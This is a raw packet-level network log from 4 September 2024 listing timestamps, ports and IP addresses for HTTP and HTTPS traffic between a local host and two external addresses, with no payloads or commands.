Sep 4, 2024 17:37:09.976479053 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976497889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976499081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976507902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976517916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976528883 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976536036 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976538897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976548910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976555109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976561069 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976562023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976572037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976583958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976604939 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976619005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976629019 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976648092 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976656914 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976659060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976670980 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976690054 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976708889 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976718903 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976744890 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976763010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976783037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976793051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976819038 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976819992 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976825953 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976830006 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976850986 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976862907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976943970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976953983 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976963043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976974964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976983070 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.976984978 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.976995945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977015972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977030993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977082014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977093935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977102995 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977112055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977116108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977138042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977159023 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977216005 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977235079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977247000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977247000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977255106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977268934 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977277994 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977296114 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977338076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977348089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977356911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977366924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977370977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977386951 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977408886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977413893 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977426052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977435112 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977444887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977447987 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977454901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977456093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977473974 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977479935 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977523088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977533102 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977541924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977555037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977555037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977569103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.977575064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977591991 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.977612972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.978205919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978214979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978224039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978254080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.978264093 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.978327990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978339911 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978348970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978358984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978372097 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.978383064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.978404999 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.978454113 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.978487968 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.984505892 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.984522104 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.984571934 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.984581947 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.984613895 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.985002041 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.985016108 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.985052109 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.985059023 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.985080004 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.985097885 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.985356092 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.985369921 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.985408068 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.985414028 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.985450983 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.986665010 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.986680031 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.986717939 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.986723900 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.986743927 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.986767054 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.987202883 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.987215996 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.987251043 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.987257957 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.987293959 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.988189936 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.988207102 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.988240004 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.988246918 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.988264084 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.988281012 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.989420891 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.989434004 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.989476919 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.989484072 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.989520073 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.989772081 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.989785910 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.989821911 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.989828110 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:09.989840984 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.989865065 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:09.999370098 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999382973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999397039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999417067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.999435902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.999448061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999458075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999466896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999476910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999480963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.999500990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.999522924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:09.999970913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999984026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:09.999993086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.000006914 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.000017881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.000026941 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.000032902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.000050068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.000072956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.000072956 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.000123024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.000133038 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.000139952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.000159025 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.000168085 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001118898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001164913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001176119 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001184940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001214027 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001233101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001301050 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001312017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001321077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001332045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001338959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001344919 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001353025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001363039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001370907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.001372099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001385927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001400948 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.001996040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002019882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002031088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002042055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002053976 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002077103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002083063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002095938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002120018 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002126932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002192974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002224922 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002248049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002258062 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002283096 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002294064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002325058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002336025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002345085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002355099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002365112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002386093 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002402067 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002444983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002456903 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002466917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002475023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002482891 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002490997 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002516985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002546072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002556086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002564907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002572060 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.002582073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.002604961 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.004492998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.004527092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.004678011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.009598017 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054255009 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054265976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054275990 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054306984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054336071 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054338932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054352999 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054363966 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054372072 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054374933 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054383993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054388046 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054398060 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054416895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054433107 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054578066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054589987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054600000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054610014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054616928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054624081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054626942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054637909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054645061 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054650068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054661036 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054671049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054673910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054683924 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054708958 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054713011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054724932 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054735899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054745913 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054769039 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054795980 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054807901 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.054827929 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.054846048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.061743021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061753988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061764002 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061781883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.061800003 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.061855078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061865091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061875105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061887026 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.061888933 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.061907053 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.061933041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062253952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062266111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062277079 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062297106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062320948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062740088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062781096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062791109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062803030 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062832117 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062850952 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062851906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062863111 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062875032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.062881947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062901020 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062913895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.062992096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063004971 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063014984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063025951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063031912 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063039064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063050032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063050985 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063062906 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063079119 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063090086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063113928 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063131094 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063147068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063158989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063165903 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063169956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063184977 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063203096 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063277960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063290119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063299894 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063311100 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063323021 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063338041 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063393116 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063405037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063414097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063426018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063432932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063441038 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063452959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063458920 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063465118 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063477039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063477993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063488960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.063493967 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.063500881 CEST	80	49717	147.45.44.104	192.168.2.6
